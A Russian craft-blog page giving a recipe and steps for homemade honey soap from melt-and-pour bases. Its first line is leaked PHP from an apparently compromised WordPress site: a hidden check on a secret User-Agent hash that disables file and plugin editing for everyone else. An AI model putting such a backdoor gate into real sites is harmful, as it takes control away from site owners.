if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт натурального мыло с медом своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт натурального мыло с медом своими руками

Мед - это по истине прекрасный антисептик и увлажнитель! Если вы любите мед и у вас никогда не было аллергии на продукты пчеловодства, то советую взять данный рецепт на вооружение.

Мед — это по истине пре­крас­ный анти­сеп­тик и увлаж­ни­тель! Если вы люби­те мед и у вас нико­гда не было аллер­гии на про­дук­ты пче­ло­вод­ства, то сове­тую взять дан­ный рецепт на вооружение.

Нам необ­хо­ди­мо иметь:

  • 70 гр. про­зрач­ной осно­вы для мыла
  • 40 гр. белой осно­вы для мыла
  • аро­ма­ти­за­тор “Мед”,
  • 1 чай­ная лож­ка меда
  • жел­тый краситель
  • Любую фор­му для мыла
  • Посу­ду для плав­ле­ний осно­вы, мед. Спирт, дере­вян­ная пал­ка для размешивания

Про­цесс приготовления:

  1. про­зрач­ную осно­ву нуж­но рас­пла­вить и доба­вить в неё 1 капель­ку жел­то­го кра­си­те­ля, 4 капель­ки аро­ма­ти­за­то­ра “Мёд” и 1 чай­ную лож­ку мёда, затем размешайте.
    mas_milo001_1
  2. Рас­плавь­те белую осно­ву для мыла.
  3. Далее нуж­но залить про­зрач­ную осно­ву в фор­му, после это­го сбрыз­нуть спир­том и дать посто­ять 3–4 минуты.
    mas_milo001_2
  4. Даль­ше опять сбрыз­ни­те спир­том и акку­рат­но залей­те в жел­тую про­зрач­ную все белые осно­вы для мыла. Они будут опус­кать­ся на дно и немнож­ко пере­ме­ши­вать­ся с жел­той. Спир­том сбрыз­ни­те поверх­ность мыла.
    mas_milo001_3
  5. Дай­те мылу остыть и достань­те из формы.

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!